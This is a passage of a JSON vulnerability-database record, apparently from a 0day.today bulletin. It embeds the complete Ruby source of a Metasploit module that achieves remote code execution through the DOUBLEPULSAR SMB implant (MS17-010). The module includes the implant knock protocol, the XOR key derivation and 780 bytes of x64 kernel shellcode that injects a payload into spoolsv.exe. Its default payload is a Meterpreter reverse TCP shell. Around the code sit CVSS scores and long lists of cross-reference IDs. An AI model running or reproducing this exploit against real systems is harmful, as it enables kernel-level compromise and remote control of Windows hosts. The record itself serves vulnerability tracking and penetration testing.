"CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0144"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96705", "SMNTC-96703", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", 
"TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0143", "MS:CVE-2017-0144"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-11T00:22:25", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-10-11T00:22:25", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This 
module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => 
MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-11] #"}, "lastseen": "2021-10-11T00:22:25", "differentElements": ["sourceData"], "edition": 40}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "94e960b65143f7cbb091143830bc3042", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant. Practitioner notes drawn from the module source: exploitation only proceeds after the check() ping confirms a live implant and recovers a valid XOR key from the SMB signature; the advanced option DefangedMode defaults to true and must be disabled explicitly, because interacting with a nation-state implant can contaminate forensic evidence; payload execution supports only x64 implants (x86 is rejected), while the Neutralize target carries no arch check; and stability is rated CRASH_OS_DOWN, so a failed kernel-mode exec can take the host down.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0146"], "immutableFields": [], "lastseen": "2021-10-12T10:30:13", "history": [], "viewCount": 111, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-27802", 
"1337DAY-ID-29702", "1337DAY-ID-27786"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96709", "SMNTC-96706", "SMNTC-96707", "SMNTC-96703", "SMNTC-96705", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", 
"TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0143", "MS:CVE-2017-0144"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "saint", "idList": 